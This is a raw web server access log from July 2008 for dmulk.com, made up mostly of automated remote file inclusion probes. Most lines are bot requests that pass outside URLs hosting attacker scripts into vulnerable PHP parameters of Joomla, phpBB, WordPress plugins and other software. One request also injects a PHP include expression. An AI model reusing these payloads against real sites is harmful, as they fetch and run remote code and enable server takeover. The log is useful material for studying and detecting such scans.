89.31.24.64 - - [14/Jul/2008:12:22:38 -0700] "GET /logs//include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:22:53 -0700] "GET //include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.88 - - [14/Jul/2008:12:23:00 -0700] "GET /blog/index.php/2008/06/ HTTP/1.0" 200 12050 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
212.227.65.79 - - [14/Jul/2008:12:23:17 -0700] "GET //common/db.php?commonpath=http://web246.webgo24-server11.de/Homepage/fightus/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [14/Jul/2008:12:23:17 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://web246.webgo24-server11.de/Homepage/fightus/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [14/Jul/2008:12:23:17 -0700] "GET /logs//common/db.php?commonpath=http://web246.webgo24-server11.de/Homepage/fightus/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
123.202.20.52 - - [14/Jul/2008:12:23:30 -0700] "GET /logs/access_080223.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:23:34 -0700] "GET /logs/access_080225.log/db.php?path_local=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.88 - - [14/Jul/2008:12:24:12 -0700] "GET /blog/index.php/2008/06/ HTTP/1.0" 200 12050 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
201.252.37.31 - - [14/Jul/2008:12:24:18 -0700] "GET /logs/access_080223.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
69.27.110.65 - - [14/Jul/2008:12:24:37 -0700] "GET /logs/access_080423.log//trans/trans.php?trans=ko&page=http://imageserenity.com/proofing/albums/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.23.156.220 - - [14/Jul/2008:12:24:37 -0700] "GET /logs/access_080315.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.printunion.ru/images/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.22.250 - - [14/Jul/2008:12:24:54 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://co.nnect.net/cache/all.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [14/Jul/2008:12:24:54 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://co.nnect.net/cache/all.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [14/Jul/2008:12:24:54 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://co.nnect.net/cache/all.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [14/Jul/2008:12:24:54 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://co.nnect.net/cache/all.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.213.218 - - [14/Jul/2008:12:25:07 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.250.42.199 - - [14/Jul/2008:12:25:12 -0700] "GET /logs/access_080223.log HTTP/1.1" 200 524288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
74.6.22.88 - - [14/Jul/2008:12:25:16 -0700] "GET /blog/index.php/2008/06/ HTTP/1.0" 200 12050 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:25:27 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:25:28 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.228.155.43 - - [14/Jul/2008:12:26:17 -0700] "GET /logs/access_080329.log//?path%5Bdocroot%5D=http://queb3.info/cruise/tanii?????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.228.155.43 - - [14/Jul/2008:12:26:19 -0700] "GET /logs//?path%5Bdocroot%5D=http://queb3.info/cruise/tanii?????????????? HTTP/1.1" 200 56141 "-" "libwww-perl/5.805" "www.dmulk.com"
206.212.247.135 - - [14/Jul/2008:12:26:46 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.54.28.163 - - [14/Jul/2008:12:26:55 -0700] "GET /logs/access.log//trans/trans.php?trans=en&page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.212.247.135 - - [14/Jul/2008:12:26:58 -0700] "GET //common/db.php?commonpath=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.212.247.135 - - [14/Jul/2008:12:26:58 -0700] "GET /logs//common/db.php?commonpath=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.54.28.163 - - [14/Jul/2008:12:27:03 -0700] "GET /logs//trans/trans.php?trans=en&page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.240.182.203 - - [14/Jul/2008:12:27:04 -0700] "GET /logs/access_080313.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.240.182.203 - - [14/Jul/2008:12:27:04 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.240.182.203 - - [14/Jul/2008:12:27:04 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.65.79 - - [14/Jul/2008:12:27:09 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://web246.webgo24-server11.de/Homepage/fightus/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
204.15.10.22 - - [14/Jul/2008:12:27:13 -0700] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
204.15.10.22 - - [14/Jul/2008:12:27:13 -0700] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:27:17 -0700] "GET /logs/errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:12:27:18 -0700] "GET /errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:12:27:22 -0700] "GET /logs/access.log/errors.php?error=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:12:27:22 -0700] "GET /errors.php?error=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:12:27:23 -0700] "GET /logs/errors.php?error=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.14.8 - - [14/Jul/2008:12:27:55 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://osiblog.extra.hu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.14.8 - - [14/Jul/2008:12:27:55 -0700] "GET /logs/access_080118.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://osiblog.extra.hu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.14.8 - - [14/Jul/2008:12:27:55 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://osiblog.extra.hu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.240.182.203 - - [14/Jul/2008:12:27:56 -0700] "GET /logs/access_080207.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:12:28:01 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.14.8 - - [14/Jul/2008:12:28:03 -0700] "GET /logs/access_080329.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://osiblog.extra.hu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:12:28:08 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:12:28:12 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 200 18593 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.252.183 - - [14/Jul/2008:12:28:44 -0700] "GET /logs/access.log/errors.php?error=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.252.183 - - [14/Jul/2008:12:28:44 -0700] "GET /errors.php?error=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.252.183 - - [14/Jul/2008:12:28:44 -0700] "GET /logs/errors.php?error=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.151 - - [14/Jul/2008:12:29:04 -0700] "GET /logs/access.log//auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://lei.crt-limousin.fr/ortl/lag/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.218.234.146 - - [14/Jul/2008:12:29:59 -0700] "GET /logs/access_080207.log//errors.php?error=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [14/Jul/2008:12:29:59 -0700] "GET //errors.php?error=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [14/Jul/2008:12:29:59 -0700] "GET /logs//errors.php?error=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [14/Jul/2008:12:30:02 -0700] "GET /logs/access_080207.log//errors.php?error=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [14/Jul/2008:12:30:02 -0700] "GET //errors.php?error=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [14/Jul/2008:12:30:02 -0700] "GET /logs//errors.php?error=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.127.47.130 - - [14/Jul/2008:12:30:07 -0700] "GET /index2.php?x=http://users5.TitanicHost.com/onix2131/cmda.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:12:30:09 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.18.142.194 - - [14/Jul/2008:12:30:23 -0700] "GET /logs/access_080329.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:12:30:49 -0700] "GET /logs/index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:12:30:50 -0700] "GET /logs/index.php?go1=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:12:30:52 -0700] "GET /index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18407 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:12:30:54 -0700] "GET /index.php?go1=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 200 18365 "-" "libwww-perl/5.69" "www.dmulk.com"
213.228.155.43 - - [14/Jul/2008:12:30:56 -0700] "GET /logs/access_080207.log//?path%5Bdocroot%5D=http://queb3.info/cruise/tanii?????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:12:31:10 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:12:31:10 -0700] "GET //common/db.php?commonpath=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:12:31:12 -0700] "GET /logs//common/db.php?commonpath=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:12:31:26 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:12:31:26 -0700] "GET //common/db.php?commonpath=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:12:31:27 -0700] "GET /logs//common/db.php?commonpath=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.218.234.146 - - [14/Jul/2008:12:31:33 -0700] "GET /logs/access.log//errors.php?error=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [14/Jul/2008:12:31:33 -0700] "GET /logs/access.log//errors.php?error=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [14/Jul/2008:12:31:36 -0700] "GET /logs/access.log/errors.php?error=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [14/Jul/2008:12:31:36 -0700] "GET /errors.php?error=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [14/Jul/2008:12:31:36 -0700] "GET /logs/errors.php?error=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.225.105.223 - - [14/Jul/2008:12:32:04 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.monsterclubcat.com//modules/My_eGallery/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
195.225.105.223 - - [14/Jul/2008:12:32:05 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.monsterclubcat.com//modules/My_eGallery/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
195.225.105.223 - - [14/Jul/2008:12:32:05 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.monsterclubcat.com//modules/My_eGallery/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:12:32:13 -0700] "GET //common/db.php?commonpath=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:12:32:51 -0700] "GET /logs/access_080128.log/?mosConfig_absolute_path=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:12:32:55 -0700] "GET /?mosConfig_absolute_path=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 200 18425 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:12:32:55 -0700] "GET /logs/?mosConfig_absolute_path=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 200 56136 "-" "libwww-perl/5.79" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:12:33:22 -0700] "GET //common/db.php?commonpath=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:12:33:26 -0700] "GET /logs/access_071218.log/?mosConfig_absolute_path=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.15.10.22 - - [14/Jul/2008:12:33:35 -0700] "GET /logs/errors.php?error=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [14/Jul/2008:12:33:35 -0700] "GET /errors.php?error=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:12:33:51 -0700] "GET /logs/access_080315.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:12:33:53 -0700] "GET /logs/access_080315.log/components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:12:33:53 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:12:33:54 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.246.29.107 - - [14/Jul/2008:12:34:03 -0700] "GET /logs/access_080327.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.29.107 - - [14/Jul/2008:12:34:05 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cusenza.altervista.org/id.txt? HTTP/1.1" 200 18499 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.29.107 - - [14/Jul/2008:12:34:06 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:12:34:08 -0700] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:12:34:08 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:12:34:10 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.225.105.223 - - [14/Jul/2008:12:34:18 -0700] "GET /logs/access_080315.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.monsterclubcat.com//modules/My_eGallery/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
65.55.211.22 - - [14/Jul/2008:12:34:27 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.22 - - [14/Jul/2008:12:34:28 -0700] "GET /?S=D&show=gallery&pageid=17&nggpage=2 HTTP/1.1" 200 54436 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
205.234.252.183 - - [14/Jul/2008:12:34:55 -0700] "GET /logs/errors.php?error=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.252.183 - - [14/Jul/2008:12:34:55 -0700] "GET /errors.php?error=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.8 - - [14/Jul/2008:12:35:19 -0700] "GET /logs/access.log/errors.php?error=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.8 - - [14/Jul/2008:12:35:20 -0700] "GET /errors.php?error=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.8 - - [14/Jul/2008:12:35:20 -0700] "GET /logs/errors.php?error=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:35:22 -0700] "GET /logs/access_080218.log/players-detail.php?id=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:35:26 -0700] "GET /players-detail.php?id=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:12:35:26 -0700] "GET /logs/players-detail.php?id=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:12:35:53 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:12:35:54 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [14/Jul/2008:12:35:55 -0700] "GET /logs/access_080109.log/components/com_hashcash/server.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/idpoi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [14/Jul/2008:12:35:55 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/idpoi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [14/Jul/2008:12:35:55 -0700] "GET /logs/components/com_hashcash/server.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/idpoi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:12:36:01 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.240.182.203 - - [14/Jul/2008:12:36:05 -0700] "GET /logs/access_080218.log/!scanhttp://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.240.182.203 - - [14/Jul/2008:12:36:06 -0700] "GET /!scanhttp://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.240.182.203 - - [14/Jul/2008:12:36:06 -0700] "GET /logs/!scanhttp://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:12:36:17 -0700] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:12:36:17 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.29.107 - - [14/Jul/2008:12:36:18 -0700] "GET /logs/access_080228.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:12:36:18 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [14/Jul/2008:12:36:25 -0700] "GET /logs/access_080313.log%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.printunion.ru/images/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
